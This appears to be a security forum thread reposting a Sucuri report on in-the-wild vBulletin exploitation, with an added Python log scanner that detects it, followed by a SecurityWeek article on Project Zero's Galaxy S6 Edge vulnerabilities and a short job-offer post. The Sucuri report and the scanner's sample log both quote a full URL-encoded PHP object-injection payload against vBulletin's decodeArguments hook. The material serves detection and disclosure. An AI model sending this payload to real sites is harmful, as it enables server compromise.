    108.47.xx.yy – – [02/Nov/2015:22:18:21 -0500] “GET /vbforum[/]ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D%22

Once decoded, it executes:

    vB_Database”:1:{s:9:”functions”;a:1:{s:11:”free_result”;s:7:”phpinfo”;}}s:12:”

This shows the attacker the result of phpinfo, indicating that his exploit succeeded. If this test payload works, the attacker will proceed with a full compromise. We are not seeing widespread exploitation attempts yet, as just a few high profile sites were targeted, but we expect that to change soon as it makes its way into the automation engines.

Patch and Protect

If we have not emphasized it before: you have to patch your vBulletin site now! Websites behind our WAF are (and always were) protected against this vulnerability due to our virtual hardening technology. If you cannot patch your vBulletin site, we recommend looking at a solution to stop these exploits before they reach you.

Source: https://blog.sucuri.net/2015/11/vbulletin-exploits-in-the-wild.html
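As an added example (not Sucuri's code), here is a small Python log scanner that flags requests carrying a PHP-serialized object into the decodeArguments hook, which is what the quoted attempt does. The access-log lines are constructed with placeholder IPs; the first mirrors the shape of the request above, the second is benign.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (placeholder IPs, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Nov/2015:22:18:21 -0500] "GET /vbforum/ajax/api/hook/'
    'decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22'
    '%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22'
    '%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7D'
    's%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D HTTP/1.1" 200 512',
    '198.51.100.9 - - [02/Nov/2015:22:19:01 -0500] "GET /vbforum/forum/general '
    'HTTP/1.1" 200 9876',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
# Header of a PHP serialized object: O:<name length>:"<ClassName>":
PHP_OBJECT_RE = re.compile(r'O:\d+:"([A-Za-z0-9_\\]+)":')

def serialized_classes(line):
    """Return the PHP class names serialized into the 'arguments' parameter
    of a decodeArguments request, [] when none, None if the line does not
    target that hook at all."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/ajax/api/hook/decodearguments"):
        return None
    found = []
    # parse_qsl percent-decodes, so %22 -> " and %00 -> NUL before matching
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == "arguments":
            found.extend(PHP_OBJECT_RE.findall(value))
    return found

def scan_log(lines):
    """Return (client_ip, [class names]) for each suspicious request. Any
    object reaching decodeArguments is worth alerting on; vB_Database with
    a 'functions' override is the pattern seen in the wild."""
    hits = []
    for line in lines:
        classes = serialized_classes(line)
        if classes:
            hits.append((line.split(" ", 1)[0], classes))
    return hits

if __name__ == "__main__":
    for ip, classes in scan_log(SAMPLE_LOG):
        print(f"{ip}: serialized object(s) {classes} sent to decodeArguments")
```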
-
No, it's only Bucuresti.
-
Google Researchers Find Serious Flaws in Galaxy S6 Edge

By Eduard Kovacs on November 03, 2015

Researchers from Google’s Project Zero have identified nearly a dozen high severity vulnerabilities in the Android operating system running on Samsung Galaxy S6 Edge smartphones.

While Google is the main developer of Android, device manufacturers such as Samsung, LG, HTC and Huawei have been using the Android Open Source Project (AOSP) source code to create their own variations of the mobile operating system. Project Zero wanted to put the security of an OEM device to the test to see how it compares against Google’s Nexus, for which the Internet giant has started releasing monthly security updates.

“OEMs are an important area for Android security research, as they introduce additional (and possibly vulnerable) code into Android devices at all privilege levels, and they decide the frequency of the security updates that they provide for their devices to carriers,” Project Zero researcher Natalie Silvanovich said in a blog post.

Ten researchers, members of Project Zero and other Google security teams, were tasked with finding vulnerabilities in Samsung’s Galaxy S6 Edge smartphone, which they claim to have chosen because it's a high-end device with a large number of users.

They specifically looked for three types of issues that can be part of a kernel privilege escalation exploit chain, including gaining remote access to contacts, photos and messages, gaining access to such data from a Google Play application that requires no permissions, and using this access to persistently execute code even after a device wipe.

A total of eleven high severity issues have been identified, the most serious being a path traversal vulnerability (CVE-2015-7888) in the Samsung WifiHs20UtilityService service that can be exploited to write arbitrary files on the system.

The email client installed on Samsung Galaxy S6 Edge devices is also plagued by a serious flaw (CVE-2015-7889), which allows an attacker to forward a user’s emails to a different account via a series of intents from an unprivileged application. Another email client issue (CVE-2015-7893) can be exploited to execute arbitrary JavaScript code embedded in a message.

Google researchers also found issues related to drivers (CVE-2015-7890, CVE-2015-7891, CVE-2015-7892) and image parsing (CVE-2015-7894, CVE-2015-7895, CVE-2015-7896, CVE-2015-7897, CVE-2015-7898).

“Overall, we found a substantial number of high-severity issues, though there were some effective security measures on the device which slowed us down. The weak areas seemed to be device drivers and media processing. We found issues very quickly in these areas through fuzzing and code review. It was also surprising that we found the three logic issues that are trivial to exploit. These types of issues are especially concerning, as the time to find, exploit and use the issue is very short,” Silvanovich explained.

The expert pointed out that while SELinux (Security-Enhanced Linux) provides significant protection, some of the bugs they have identified can be exploited to disable this kernel security module.

Project Zero reported the vulnerabilities to Samsung in late July and eight of them were addressed by the vendor with its October maintenance release. The remaining three security bugs will be resolved later this month, but researchers say the unpatched issues have a lower severity.

After the existence of the critical Stagefright vulnerabilities came to light this summer, Samsung, LG and other phone manufacturers announced their plans to release monthly security updates designed to patch Android vulnerabilities. But not all vendors rushed to make such commitments. HTC said it will push for monthly security updates, but the company has deemed monthly update guarantees “unrealistic.”

Source: http://www.securityweek.com/google-researchers-find-serious-flaws-galaxy-s6-edge
-
If anyone is familiar with one of these languages and wants to learn more and to work, send me a PM for more information. I don't have more details, but if you are interested I can put you in touch with a person at the company in question.